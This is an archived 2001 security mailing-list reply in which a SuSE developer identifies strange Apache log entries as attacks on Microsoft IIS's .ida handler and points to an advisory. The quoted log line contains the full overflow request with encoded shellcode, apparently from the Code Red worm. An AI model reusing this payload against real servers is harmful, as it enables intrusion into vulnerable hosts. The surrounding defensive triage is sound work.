Mailinglist Archive: opensuse-security (343 mails)

< Previous Next >
Re: [suse-security] Strange HTTP requests
  • From: Rainer Link <link@xxxxxxx>
  • Date: Thu, 19 Jul 2001 20:55:09 +0200 (CEST)
  • Message-id: <Pine.LNX.4.33.0107192052380.5155-100000@xxxxxxxxxxxx>
On Thu, 19 Jul 2001, Lars Trebing wrote:

> My Apache has just got three strange requests from three different
> addresses:
>
> 63.149.209.133 - - [19/Jul/2001:18:55:47 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

IIRC those *.ida stuff is related to MS IIS and it reminds me of
http://www.eeye.com/html/Research/Advisories/AD20010618.html.

Please see http://www.newsbytes.com/news/01/168003.html, too.

best regards,
Rainer Link

--
Rainer Link | SuSE - The Linux Experts
link@xxxxxxx | Developer of A Mail Virus Scanner (amavis.org)
www.suse.de | Founder OpenAntiVirus Project (www.openantivirus.org)


< Previous Next >
Follow Ups
References